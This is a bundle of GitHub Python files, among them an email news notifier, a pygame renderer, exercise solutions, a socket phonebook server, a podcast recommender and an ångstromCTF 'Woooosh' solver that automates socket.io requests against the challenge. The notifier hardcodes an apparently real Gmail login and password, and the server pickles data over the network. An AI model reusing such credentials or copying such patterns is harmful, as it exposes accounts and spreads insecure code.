{"seq_id":"41762926584","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport requests\nimport time\nimport smtplib\nfrom email.mime.text import MIMEText\n\ndef sendEmail(title,message,destination):\n\n    fromaddress = 'ringlgamesh@gmail.com'\n    toaddress = destination\n\n    server = smtplib.SMTP('smtp.gmail.com:587')\n    server.starttls()\n    server.login('ringlgamesh@gmail.com','Google#9527')\n\n    msg = MIMEText(message)\n    msg['From'] = fromaddress\n    msg['To'] = toaddress\n    msg['Subject'] = (title)\n\n    server.sendmail(fromaddress,toaddress,msg.as_string())\n    server.quit()\n\n#ID = requests.get('https://www.iyingdi.cn/feed/list/seed/v2?web=1&seed=2&system=web').json().get('feeds')[0].get('feed').get('sourceID')\nID = None\n\nwhile True: \n\n    Time = time.localtime()\n    \n    if Time.tm_sec == 0:\n\n        FEED = requests.get('https://www.iyingdi.cn/feed/list/seed/v2?web=1&seed=2&system=web').json().get('feeds')[0].get('feed')\n        tmp = FEED.get('sourceID')\n\n        if tmp != ID:\n            title = FEED.get('title')\n            description = FEED.get('description')\n            mailTitle = '炉石新文章:'+title.encode('utf-8')\n            mailContent = description.encode('utf-8')\n            sendEmail(mailTitle,mailContent,'582981961@qq.com')\n            ID = tmp\n\n    time.sleep(1)\n","repo_name":"FinchChen/bilibili","sub_path":"旅法师文章更新检测.py","file_name":"旅法师文章更新检测.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"18614610468","text":"'''\nMain indexing process:\ninitializing the UniGramIndexer class takes the corpus's path as input\nwrite_inverted_index takes the path where the index will be saved. For this project, save the index under the\ndirectory of the related corpus\n'''\n\nfrom src.Indexer import UniGramIndexer\n\n\nclass Indexing:\n    def main(self, path):  # path = ../corpus with stopping\n        indexer = UniGramIndexer(path)\n        indexer.uni_gram_indexer()\n        indexer.write_inverted_index(path + '/index')\n","repo_name":"ethanZHY/Basic-Search-Engine","sub_path":"src/indexing.py","file_name":"indexing.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"4651135130","text":"import pygame\nfrom pygame.locals import Color\n\n__author__ = 'Sam'\n\n# todo: port to https://github.com/tipam/pi3d\n# todo: make this file thread-safe (VERY IMPORTANT!!! 
Board crashes otherwise!)\n\nclass TextRendererBase():\n def __init__(self):\n self._image = None\n self._rect = None\n\n def _render(self):\n self._rect = self._image.get_rect()\n\n def render(self, screen, x, y, text=None):\n pass\n\n def render_width(self):\n if self._image is None:\n self._render()\n return self._rect.width\n\n def render_height(self):\n if self._image is None:\n self._render()\n return self._rect.height\n\n\nclass TextImg(TextRendererBase):\n def __init__(self, font=None, color=\"white\", size=32):\n TextRendererBase.__init__(self)\n self._color = color\n if isinstance(color, basestring):\n self._color = Color(color)\n self._text = None\n self._font = font if font is not None else pygame.font.Font(pygame.font.match_font('Arial'), size)\n\n def _render(self):\n self._image = self._font.render(self._text, True, self._color)\n self._image.set_alpha(self._color.a) # todo - this doesn't work?\n self._rect = self._image.get_rect()\n\n def set_text(self, text):\n if text != self._text:\n self._text = unicode(text)\n self._image = None\n\n def get_text(self):\n return self._text\n\n def set_color(self, color):\n self._color = Color(color)\n self._image = None\n\n def render(self, screen, x, y, text=None):\n if text is not None:\n self.set_text(text)\n if self._image is None:\n self._render()\n self._rect.topleft = (x, y)\n screen.blit(self._image, self._rect, special_flags=0)\n\n\nclass MultiColoredTextImg():\n def __init__(self, font=None, colors=(), parts=None):\n self.width = 0\n self.height = 0\n if parts is not None:\n self._parts = parts\n else:\n self._parts = []\n for color in colors:\n self._parts.append(TextImg(font, color))\n\n def set_text(self, index, text):\n self._parts[index].set_text(text)\n\n offset = 0\n for part in self._parts:\n offset += part.render_width()\n self.height = part.render_height()\n self.width = offset\n\n def render(self, screen, x, y):\n offset = 0\n for part in self._parts:\n part.render(screen, x + offset, y)\n offset += part.render_width()\n\n\nclass OutlinedTextImg(TextRendererBase):\n def __init__(self, font=None, color=\"white\", size=32, outercolor=\"black\", outlinesize=1):\n TextRendererBase.__init__(self)\n self._outlinesize = outlinesize\n self._inner_text = TextImg(font, color, size)\n self._outer_text = TextImg(font, outercolor, size)\n\n def _render(self):\n self._image = pygame.Surface((self._inner_text.render_width() + 2 * self._outlinesize,\n self._inner_text.render_height() + 2 * self._outlinesize), pygame.SRCALPHA)\n self._image.set_alpha(0)\n for x in range(0, 2 + 1):\n for y in range(0, 2 + 1):\n if not (x == 1 and y == 1):\n self._outer_text.render(self._image, x * self._outlinesize, y * self._outlinesize)\n self._inner_text.render(self._image, self._outlinesize, self._outlinesize)\n self._rect = self._image.get_rect()\n\n def set_text(self, text):\n if self._inner_text.get_text() == text:\n return\n self._image = None\n self._inner_text.set_text(text)\n self._outer_text.set_text(text)\n\n def render(self, screen, x, y, text=None):\n if text is not None:\n self.set_text(text)\n if self._image is None:\n self._render()\n self._rect.topleft = (x, y)\n screen.blit(self._image, self._rect)\n\n\nclass Gradient():\n def __init__(self, width, height, topcolor, bottomcolor):\n self._image = pygame.Surface((width, height), pygame.SRCALPHA)\n self._image.set_alpha(0)\n self._rect = self._image.get_rect()\n color = pygame.Color(\"black\")\n for y in range(0, height):\n scale = y / float(height)\n color.r = int((topcolor.r * (1 - 
scale)) + (bottomcolor.r * scale))\n color.g = int((topcolor.g * (1 - scale)) + (bottomcolor.g * scale))\n color.b = int((topcolor.b * (1 - scale)) + (bottomcolor.b * scale))\n color.a = int((topcolor.a * (1 - scale)) + (bottomcolor.a * scale))\n pygame.draw.line(self._image, color, (0, y), (width - 1, y))\n\n def render(self, screen, x, y):\n self._rect.topleft = (x, y)\n screen.blit(self._image, self._rect)","repo_name":"sammessina/informant","sub_path":"src/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"23005448925","text":"# ============================================================================ #\n# problem 1\n\n# Locally, i.e. within the scope of swap, this actually does perform a triangle\n# exchange. That means, the local variables x_swap and y_swap now reference \n# memory cells such that they have the other variables initial value.\n# However, this is disconnected from the state of the module level: neither \n# x_main nor y_main \"see\" any of the effects done to x_swap and y_swap.\n# \n# memory model:\n#\n# --------+--------+--------+--------+--------+--------+--------+--------+------\n# 100 | 101 | 103 | 104 | 105 | 106 | 107 | 108 | ...\n# x_main | y_main | x_swap | y_swap | | | | |\n# -> 105 | -> 106 | -> 107 | -> 108 | 2 | 3 | 3 | 2 |\n#\n# (rows in this picture signify: memory address, variable name, content of the\n# memory cell)\n\n\n# ============================================================================ #\n# problem 2\n\nprint(\"PI MONTE CARLO APPROXIMATION\")\n\nimport random\n\ndef getPi(accuracy) :\n N = 0\n\n for run in range(accuracy) :\n x = random.uniform(0, 1)\n y = random.uniform(0, 1)\n\n if x*x + y*y < 1 : N += 1\n\n return 4 * N/accuracy\n\nfor p in range(10, 15) :\n accuracy = 2**p\n print(f\"accuracy: {accuracy:7}, pi ~ {getPi(accuracy)}\")\n\nprint()\n\n\n# ============================================================================ #\n# problem 3\n\nprint(\"### INTEGRAL (I)\")\n\nimport math\n\ndef integrate(func, start, stop, N) :\n result = 0\n width = (stop - start) / N\n\n for i in range(N) :\n x = start + i * width\n result += func(x) * width\n\n return result\n\nprint( integrate(math.exp, 0, 1, 10000) )\n\n\n# ============================================================================ #\n# problem 4\n\nprint(\"RANDOM WALK\")\n\nimport random # already imported from task 2, but importing it a second time does precisely nothing\n\n# obligatory part with optional extension 1:\n# Basic Simulation with finite width of the road\ndef simulateDrunkard(N, bias, W) :\n drift = 0\n for step in range(N) :\n r = random.uniform(0, 1)\n\n if r < bias :\n if drift != -W : drift -= 1\n else :\n if drift != +W : drift += 1\n\n return drift\n\n\n# optional extension 2: generation of the histogram list\ndef getHistogram(K, N, bias, W) :\n outcomes = [simulateDrunkard(N, bias, W) for i in range(K)]\n return {d : outcomes.count(d) for d in range(-W, W+1)}\n\n\n# optional extension 3: display histogram as chart\ndef showHistogram(histogram) :\n for d, v in histogram.items() :\n print(f\"{d:+3}\", \"#\" * v)\n\n\n# driver code\nruns = 500 # how often to send the drunkard down the road\nN = 21 # how many steps to take\nB = 10 # width of the road\npLeft = 0.5 # bias to the left (go left 100% of the time --> 1)\n\nprint(\"three random outcomes:\")\nprint( simulateDrunkard(N, pLeft, B) )\nprint( simulateDrunkard(N, pLeft, B) 
)\nprint( simulateDrunkard(N, pLeft, B) )\nprint()\n\nprint(\"histogram data:\")\nhistogram = getHistogram(runs, N, pLeft, B)\nprint( histogram )\n\nprint(\"histogram plot:\")\nshowHistogram( histogram )\n","repo_name":"TheBlueChameleon/Py_Exos_Reduced","sub_path":"X06/06-solutions.py","file_name":"06-solutions.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"1806554346","text":"import pprint\n\nmessage = 'Today is Friday. It is a rainy day.'\ncount = {}\n\nfor character in message.upper():\n    count.setdefault(character, 0)\n    count[character] = count[character] + 1\n\n# rjtext = pprint.pformat (count)\n# print (rjtext)\n\npprint.pprint (count)\n","repo_name":"radoaller/learnpython","sub_path":"Counting Characters.py","file_name":"Counting Characters.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"27365965823","text":"from selenium import webdriver\nimport time\nimport pymysql\n\n\n# fetch the ids of the songs on the chart\ndef getId():\n    try:\n        arr=[]\n        browser = webdriver.Chrome('/usr/local/bin/chromedriver')\n        browser.get(\"https://music.163.com/#/discover/toplist?id=3779629\")\n        iframe_elemnt = browser.find_element_by_id(\"g_iframe\")\n        # iframe_elemnt = browser.find_element_by_id(\"g_iframe\")\n        browser.switch_to.frame(iframe_elemnt)\n        elements = browser.find_elements_by_xpath('//tr')\n        for item in elements:\n            id = item.get_attribute('id')\n            arr.append(id[:10])\n            print(id)\n        return arr\n    except:\n        print('failed to fetch ids')\n        return ''\n\n\n\n\ndef main():\n    list = getId() \n    print(list)\n\nmain()","repo_name":"joshuaaam/-scrapy-","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"36935476859","text":"import numpy as np\nimport numpy.random as rand\nimport pickle\nimport json\nimport pandas\nfrom subprocess import call\n\nclass Podcast:\n    def __init__(self, title, vec, rss):\n        self.title = title\n        self.vec = np.array(vec)\n        self.rss = rss\n\n    def cosine(self, p):\n        v = p.vec\n        num = np.dot(v,self.vec)\n        denom = np.linalg.norm(self.vec) * np.linalg.norm(v)\n\n        res = num / denom\n\n        return res\n\ndef add_like(user_id, title):\n    liked = {}\n    try:\n        with open(\"likes.json\", \"r\") as flike:\n            liked = json.load(flike)\n    except FileNotFoundError as ex:\n        print(\"No file found, setting liked = {}\")\n\n\n\n    if not user_id in liked:\n        liked[user_id] = []\n\n    if not title in liked[user_id]:\n        liked[user_id].append(title)\n\n    try:\n        with open(\"likes.json\", \"w\") as flike:\n            json.dump(liked, flike)\n    except FileNotFoundError as ex:\n        print(\"No file found, setting liked = {}\")\n\n    return json.dumps(liked[user_id])\n\ndef get_rec(user_id, n = 1):\n    liked = {}\n    try:\n        with open(\"likes.json\", 'r') as flike:\n            liked = json.load(flike)\n    except FileNotFoundError as ex:\n        print(\"No file found, setting liked = {}\")\n\n    df = pandas.read_json(\"trained_embeddings.json\")\n    podcasts = {\n        row['title']:\n        Podcast(row['title'], row['vector'], row['rss']) \n        for i, row in df.iterrows()}\n\n    if user_id not in liked:\n        print(\"USER NOT FOUND\")\n        return \"\"\n\n    distances = {title: 1 for title, _ in podcasts.items()}\n    for title in liked[user_id]:\n        temp_distances = [(podcast.title, podcasts[title].cosine(podcast)) for _, podcast in podcasts.items()]\n        for p_title, distance in 
temp_distances:\n            distances[p_title] *= distance\n    \n    res_dists = [(k, d) for k, d in distances.items() if d != 0]\n\n    res_dists.sort(key=lambda kv: kv[1])\n\n    \n    return [\n        {\n            'title':podcasts[title].title, \n            'rss':podcasts[title].rss\n        }\n        for title, dist in res_dists[:n]]\n\nadd_like(\"cjen1\", \"Nobody Told Me!\")\n\n","repo_name":"Cjen1/HackMIT-Recommends","sub_path":"server/recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"37170036724","text":"from contact import Contact\n\nimport socket\nimport os\nimport threading\nimport xml.etree.ElementTree as ET\nimport pickle\n\n#Constant Information\nIP = socket.gethostbyname(socket.gethostname())\nPORT = 9999\nADDR = (IP, PORT)\nFORMAT = \"utf-8\"\nSIZE = 1024\n\n#All command\nCOMMAND = { \n    0: \"!DISCONNECT\",\n    1: \"!DISPLAY_LIST\",\n}\n\n#Load phonebook and contact\nphonebook = ET.parse('phonebook.xml') #Open file\ncontact = phonebook.findall('contact') #Open as tree\n\n#Make contact list from tree\ndef compileContactList() -> bytes:\n    ls = []\n    for c in contact:\n        ls.append(compileFromTree(c))\n\n    return ls\n\n#Find by name\ndef findByName(name: str):\n    result = []\n    for c in contact:\n        if c.find('name').text == name:\n            result.append(compileFromTree(c))\n    return result\n\n#Find by phone\ndef findByPhone(phone: str):\n    result = []\n    for c in contact:\n        if c.find('phone').text == phone:\n            result.append(compileFromTree(c))\n    return result\n\n#Find by email\ndef findByEmail(email: str):\n    result = []\n    for c in contact:\n        if c.find('email').text == email:\n            result.append(compileFromTree(c))\n    return result\n\n#Find contact and return the contact\ndef findContact(msg: str):\n    foundContacts = []\n\n    if msg[6:10] == 'NAME':\n        foundContacts = findByName(msg[11:])\n    elif msg[6:10] == 'NUMB':\n        foundContacts = findByPhone(msg[11:])\n    elif msg[6:10] == 'MAIL':\n        foundContacts = findByEmail(msg[11:])\n\n    #Check return information\n    if foundContacts:\n        result = foundContacts\n    else:\n        result = []\n\n    return result\n\n#Create a contact from tree Element\ndef compileFromTree(info: ET.Element) -> Contact:\n    file = open(f\"photo\\\\{info.attrib['id']}.jpg\", 'rb')\n    data = file.read()\n    return Contact(info.find('name').text, info.attrib['id'], info.find('phone').text, info.find('email').text, data)\n\n# Main client-handling logic lives in this section\ndef handle_client(clientSocket, clientAddr):\n    print(f\"[CONNECTION] {clientAddr} connected.\")\n\n    connected = True\n    while connected:\n        msg = clientSocket.recv(SIZE).decode(FORMAT)\n        if not msg:\n            continue\n\n        if msg == COMMAND[0]:\n            connected = False\n            continue\n        elif msg == COMMAND[1]:\n            result = compileContactList()\n        elif msg[1:5] == 'FIND':\n            result = findContact(msg)\n        else:\n            print(f'[{clientAddr}] Unknown message: {msg}')\n            continue\n        \n        respond = pickle.dumps(result)\n        respondSize = len(respond)\n        \n        clientSocket.send(str(respondSize).encode(FORMAT))\n        clientSocket.send(respond)\n\n    clientSocket.close()\n    print(f\"[DISCONNECT] {clientAddr} Disconnected.\")\n\n\ndef main():\n    os.system('cls')\n    print(\"[STARTING] Server is starting\")\n    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    server.bind(ADDR)\n    server.listen()\n    print(\"[LISTENING] Waiting for client\")\n    while True:\n        conn, addr = server.accept()\n        thread = threading.Thread(target = handle_client, args=(conn, addr))\n        thread.start()\n\n        print(f\"[CONNECTION] Active connection: 
{threading.active_count() - 1}.\")\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CorvoLieu/Socket-Dev","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70314730723","text":"#!/usr/bin/python\n\nimport requests\nimport time\nimport math\n\nverbose = True\n\ntarget_site = \"https://wooooosh.2020.chall.actf.co/\"\ntarget_endpoint_without_sid = target_site + \"socket.io/?EIO=3&transport=polling&t={}\"\ntarget_endpoint = target_endpoint_without_sid + \"&sid={}\"\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);\", \n \"Content-Type\": \"text/plain;charset=UTF-8\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Origin\": \"https://wooooosh.2020.chall.actf.co\",\n \"Referer\": \"https://wooooosh.2020.chall.actf.co/\",\n}\n\ndef log_message(message):\n if verbose:\n print(message)\n\n\ndef log_data(answer):\n if verbose:\n print(\"-----------------------------------\")\n print(answer)\n print(\"-----------------------------------\")\n\n\ndef get_sid_from_cookies(cookies):\n sid = None\n #log_message(\"[*] Cookies:\")\n for cookie in cookies:\n #log_message(\"[*] - {}={}\".format(cookie.name, cookie.value))\n if cookie.name == \"io\":\n sid = cookie.value\n #log_message(\"[*] Found sid: {}.\".format(sid))\n return sid\n\n\ndef generate_t_param():\n timestamp = int(round(time.time() * 1000))\n return yeast_encode(timestamp)\n\n\n# https://github.com/unshiftio/yeast/blob/28d15f72fc5a4273592bc209056c328a54e2b522/index.jsL17\ndef yeast_encode(num):\n alphabet = list(\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz-_\")\n length = len(alphabet)\n encoded = \"\"\n \n while True:\n encoded = alphabet[num % length] + encoded\n num = math.floor(num / length)\n if num <= 0:\n break\n \n return encoded\n\n\ndef generate_payload(payload):\n return \"{}:{}\".format(str(len(payload)), payload)\n\n\ndef generate_start_payload():\n start_payload = generate_payload(\"42[\\\"start\\\"]\")\n #log_data(start_payload)\n return start_payload\n\n\ndef generate_answer_payload(x, y):\n answer_payload = generate_payload(\"42[\\\"click\\\",{},{}]\".format(x, y))\n #log_data(answer_payload)\n return answer_payload\n\n\nt = generate_t_param()\nurl = target_endpoint_without_sid.format(t)\n#log_message(\"[*] Getting sid. {}\".format(url))\nr = requests.get(url, headers=headers)\ncookies = r.cookies\n#log_data(r.text)\nsid = get_sid_from_cookies(cookies)\n\nt = generate_t_param()\nurl = target_endpoint.format(t, sid)\n#log_message(\"[*] Starting the game. {}\".format(url))\nr = requests.post(url, headers=headers, cookies=cookies, data=generate_start_payload())\ncookies = r.cookies\n#log_data(r.text)\n\n#log_message(\"[*] Playing the game.\")\nscore = \"\"\nstart_time = int(round(time.time() * 1000))\nbad_gateway_retries = 0\nwhile True:\n\n while True:\n t = generate_t_param()\n url = target_endpoint.format(t, sid)\n #log_message(\"[*] Polling. {}\".format(url))\n r = requests.get(url, headers=headers, cookies=cookies)\n cookies = r.cookies\n content = r.text\n #log_data(content)\n \n if r.status_code == 502:\n bad_gateway_retries += 1\n t = generate_t_param()\n url = target_endpoint_without_sid.format(t)\n #log_message(\"[*] Getting sid. 
{}\".format(url))\n r = requests.get(url, headers=headers)\n cookies = r.cookies\n #log_data(r.text)\n sid = get_sid_from_cookies(cookies)\n else:\n break\n \n if \"actf{\" in content:\n print(\" \")\n print(\"[*] =====================================\")\n print(\"[*] =====================================\")\n print(\"[*] =====================================\")\n print(\"[*] vvvvvvvvvvvv FLAG FOUND! vvvvvvvvvvvv\")\n print(\" \")\n print(content)\n print(\" \")\n print(\"[*] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\")\n print(\"[*] =====================================\")\n print(\"[*] =====================================\")\n print(\"[*] =====================================\")\n print(\" \")\n break\n elif \"terrible\" in content or \"disconnected\" in content:\n end_time = int(round(time.time() * 1000))\n total_time = (end_time - start_time) / 1000\n print(\"[*] FAILED! Score: {} ({} secs, {} 502 retries)\".format(score, str(total_time), str(bad_gateway_retries)))\n break\n elif \"shapes\" in content:\n #log_message(\"[*][shapes] Response intercepted.\")\n coordinates = content[21:34].replace(\"{\", \"\").replace(\"}\", \"\").replace(\"[\", \"\").replace(\"]\", \"\").replace(\"\\\"\", \"\").replace(\"x\", \"\").replace(\"y\", \"\").replace(\":\", \"\")\n best_x = coordinates.split(\",\")[0]\n best_y = coordinates.split(\",\")[1]\n #log_message(\"[*][shapes] The best position is at {}, {}.\".format(best_x, best_y))\n if \"score\" in content:\n score = content[-5:-1].replace(\"]\", \"\").replace(\",\", \"\").replace(\"\\\"\", \"\").replace(\"e\", \"\")\n #log_message(\"[*][shapes] Score: {}.\".format(score))\n t = generate_t_param()\n url = target_endpoint.format(t, sid)\n #log_message(\"[*] Send answer. {}\".format(url))\n r = requests.post(url, headers=headers, cookies=cookies, data=generate_answer_payload(best_x, best_y))\n cookies = r.cookies\n content = r.text\n #log_data(content)\n elif \"score\" in content:\n #log_message(\"[*][score] Response intercepted.\")\n score = content[-5:-1].replace(\"]\", \"\").replace(\",\", \"\").replace(\"\\\"\", \"\").replace(\"e\", \"\")\n #log_message(\"[*][score] Score: {}.\".format(score))","repo_name":"m3ssap0/CTF-Writeups","sub_path":"ångstromCTF 2020/Woooosh/solver-woooosh.py","file_name":"solver-woooosh.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"54"} +{"seq_id":"16923692544","text":"from __future__ import annotations\n\nfrom concurrent.futures import CancelledError\n\nimport pytest\n\nfrom nwave import task\n\n\ndef test_task():\n # Create a Task\n t = task.Task(\"src.wav\", \"dst.wav\", [], True)\n assert isinstance(t, task.Task)\n\n\ndef test_task_result():\n # Check basic creation of TaskResult\n t = task.Task(\"src.wav\", \"dst.wav\", [], True)\n tr = task.TaskResult(t, None)\n assert isinstance(tr, task.TaskResult)\n assert tr.success\n assert tr.error is None\n\n # Check str representation\n assert str(tr) == \"Task: src.wav -> dst.wav\\n[Completed]\"\n\n # Check str for canceled task\n tr = task.TaskResult(t, CancelledError())\n assert str(tr) == \"Task: src.wav -> dst.wav\\n[Cancelled]\"\n\n # Check str for failed task\n tr = task.TaskResult(t, ValueError(\"test\"))\n assert str(tr) == \"Task: src.wav -> dst.wav\\n[Failed]: test\"\n\n\ndef test_task_exception():\n # Create a TaskException\n te = task.TaskException(ValueError(\"VE\"))\n assert str(te) == \"VE\"\n with pytest.raises(task.TaskException):\n raise te\n\n # Test raising info\n te 
= task.TaskException(ValueError(\"VE\"), during=\"Step-1\")\n    try:\n        raise te\n    except task.TaskException as e:\n        assert str(e) == \"During Step-1 -> ValueError: VE\"\n","repo_name":"ionite34/nwave","sub_path":"tests/test_task.py","file_name":"test_task.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"}
{"seq_id":"10908137067","text":"\"\"\" syspath_utils module. \"\"\"\nimport os\nimport re\nimport sys\nfrom itertools import chain\nfrom pathlib import Path, PurePath\nfrom string import Template\nfrom types import ModuleType\nfrom typing import Dict, List, Optional, Pattern, Set, Tuple, Union\n\nfrom .syspath_path_utils import get_project_root_dir\nfrom .syspath_sleuth import get_customize_path\n\n_STD_SYSPATH_FILTER: Union[None, Pattern] = None\n\nPATH_TO_PROJECT_PLACEHOLDER = \"path_to_project\"\n\n\ndef init_std_syspath_filter(std_syspath_filter: Pattern) -> None:\n    \"\"\"\n    Provide a globally bound standard filter Pattern applied to all subsequent sys.path filtering\n    operations. Note: init_std_syspath_filter() is called from __init__.py to default to a\n    globally applied pattern.\n    :param std_syspath_filter: pattern to apply to all filter operations. Can be None.\n    :return: None\n    \"\"\"\n    # pylint: disable=global-statement\n    global _STD_SYSPATH_FILTER\n    # pylint: enable=global-statement\n    _STD_SYSPATH_FILTER = std_syspath_filter\n\n\ndef filtered_sorted_syspath(\n    path_filter: Pattern = None,\n    no_filtering: bool = False,\n    sort: bool = False,\n    unique: bool = False,\n) -> List[str]:\n    \"\"\"\n    Filter and sort the sys.path for only paths of interest.\n    :param path_filter: a pattern that the caller can provide in addition to the std_syspath_filter\n    :param no_filtering: allow the caller to skip filtering entirely\n    :param sort: allow caller to sort the filtered (if filtering) sys.path\n    :param unique: allow caller to only return unique members of sys.path\n    :return: sys.path with filtering and sorting applied\n    \"\"\"\n    paths: List[str] = sys.path\n    if not no_filtering:\n        path: str\n        if _STD_SYSPATH_FILTER:\n            paths = [path for path in paths if not re.search(_STD_SYSPATH_FILTER, path)]\n        if path_filter:\n            paths = [path for path in paths if not re.search(path_filter, path)]\n\n    if sort:\n        paths = sorted(paths, reverse=True)\n\n    if unique:\n        unique_paths: List[str] = []\n        for path in paths:\n            if path not in unique_paths:\n                unique_paths.append(path)\n\n        paths = unique_paths\n\n    return paths\n\n\ndef print_syspath(\n    path_filter: Pattern = None, no_filtering: bool = False, sort: bool = True, unique: bool = False\n) -> None:\n    \"\"\"\n    Filter and sort the sys.path for only paths of interest, then print the result.\n    :param path_filter: a pattern that the caller can provide in addition to the std_syspath_filter\n    :param no_filtering: allow the caller to skip filtering entirely\n    :param sort: allow caller to sort the filtered (if filtering) sys.path\n    :param unique: allow caller to only return unique members of sys.path\n    :return: None\n    \"\"\"\n    paths: List[str] = filtered_sorted_syspath(path_filter, no_filtering, sort, unique)\n    print(f\"\\nsys.path({len(paths)} paths):\")\n    path: str\n    for path in paths:\n        print(f\"\\t{path}\")\n\n\ndef persist_syspath(\n    user_provided_project_dir: Path = None,\n    force_pth_dir_creation: bool = False,\n    path_filter: Pattern = None,\n) -> None:\n    \"\"\"\n    Persist a set of ordered [000-999]*.pth.template files that represent each\n    project-related entry in the sys.path. 
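# A minimal usage sketch for the two filtering helpers above (assumption: the
# package is importable as runtime_syspath; the regex is only an example):
import re
from runtime_syspath import print_syspath
# Hide site-packages noise; print the remaining sys.path entries sorted and deduplicated.
print_syspath(path_filter=re.compile(r"site-packages"), sort=True, unique=True)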
The files are persisted into the\n    /pathto/projectroot/pths directory. If caller did not supply the /pathto/projectroot via\n    'user_provided_project_dir', attempt to determine that.\n\n    :param user_provided_project_dir: root of project using persist_syspath()\n    :param force_pth_dir_creation: force directory creation without prompting\n    :param path_filter: a pattern that the user can provide in addition to the std_syspath_filter\n    :return: None\n    \"\"\"\n    project_dir: PurePath = (\n        user_provided_project_dir if user_provided_project_dir else get_project_root_dir()\n    )\n\n    template_dir: Path = Path(project_dir / \"pths\")\n\n    if not template_dir.exists():\n        create = force_pth_dir_creation or input(\n            f\"Create {template_dir}? [y,n] \"\n        ).strip().lower().startswith(\"y\")\n        if create:\n            template_dir.mkdir(mode=0o766)\n\n    sys_paths: List[str] = filtered_sorted_syspath(path_filter, unique=True)\n    for index, sys_path_str in enumerate(sys_paths):\n        if not sys_path_str.startswith(os.fspath(project_dir)):\n            continue\n        pth_path = Path(sys_path_str)\n        relative_pth: PurePath = pth_path.relative_to(project_dir)\n        # A project's root directory is rarely added to sys.path by a targeted application. It is\n        # more likely that it was added by python itself when executing a module, e.g.:\n        # python -m pytest ... or even when the Pycharm debugger is used. Skipping persisting\n        # project_dir in sys.path (relative_to() yields '.' for the project root itself)\n        if relative_pth == PurePath(\".\"):\n            continue\n        template_path = Path(\n            template_dir,\n            f\"{index:03d}_{project_dir.stem}_\"\n            f\"{os.fspath(relative_pth).replace(os.sep, '_')}.pth.template\",\n        )\n\n        if template_path.exists():\n            continue\n\n        with template_path.open(\"x\") as template_path_f:\n            # Write template that can be converted to wherever a project's clones are\n            # rooted using inject_project_pths_to_site()\n            relative_pth = (\n                os.sep + os.fspath(relative_pth) if relative_pth != Path(\"root\") else Path(\"\")\n            )\n            template_path_f.write(f\"${{{PATH_TO_PROJECT_PLACEHOLDER}}}{relative_pth}\\n\")\n\n    dedup_pth_templates(template_dir)\n\n\ndef inject_project_pths_to_site(user_provided_project_dir: PurePath = None) -> None:\n    \"\"\"\n    Iterate through all templates in /pathto/projectroot/pths converting the templates to\n    the paths rooted to the current /pathto/projectroot. 
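# Sketch of what a generated .pth.template holds and how it is filled in via
# string.Template, as get_pth_templates() below does (paths here are hypothetical):
from string import Template
template_str = "${path_to_project}/src"  # as written by persist_syspath()
filled = Template(template_str).substitute({"path_to_project": "/home/me/myproj"})
# filled == "/home/me/myproj/src", ready to be written into a site .pth file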
If caller did not supply the\n    /pathto/projectroot via 'user_provided_project_dir', attempt to determine that.\n\n    :param user_provided_project_dir: root of project using inject_project_pths_to_site()\n    \"\"\"\n    project_dir: Path = (\n        Path(user_provided_project_dir)\n        if user_provided_project_dir\n        else Path(get_project_root_dir())\n    )\n\n    clear_site_pths(project_dir.stem)\n\n    template_dir: Path = Path(project_dir / \"pths\")\n    if not template_dir.exists():\n        print(f\"No pth templates found within {os.fspath(template_dir)}\")\n        return\n\n    site_path = get_customize_path()[0].parent\n    pth_templates = get_pth_templates(template_dir)\n    for template_path in pth_templates:\n        site_pth_path: Path = site_path / template_path.stem\n        with site_pth_path.open(\"w\") as site_pth_path_f:\n            site_pth_path_f.write(pth_templates[template_path])\n\n\ndef clear_site_pths(project_name: str) -> None:\n    site_path = get_customize_path()[0].parent\n    project_site_pth: Path\n    for project_site_pth in site_path.glob(f\"[0-9][0-9][0-9]_{project_name}_*.pth\"):\n        project_site_pth.unlink()\n\n\ndef dedup_pth_templates(template_dir) -> None:\n    \"\"\"\n    get_pth_templates dedups for us; just making it obvious that the return value has no value.\n    :param template_dir:\n    \"\"\"\n    get_pth_templates(template_dir)\n\n\ndef get_pth_templates(template_dir: Path) -> Dict[Path, str]:\n    \"\"\"\n    For each template in template_dir, fill in template with 'project_name' and clean up any\n    templates that would represent the same path being added to sys.path.\n\n    :param template_dir:\n    :return: dictionary mapping template Path to the filled-in string\n    \"\"\"\n    substitution_map: Dict[str, str] = {PATH_TO_PROJECT_PLACEHOLDER: os.fspath(template_dir.parent)}\n    pth_templates: Dict[Path, str] = {}\n    filled_in_path_to_file_map: Dict[str, str] = {}\n    templates_paths: List[Path] = 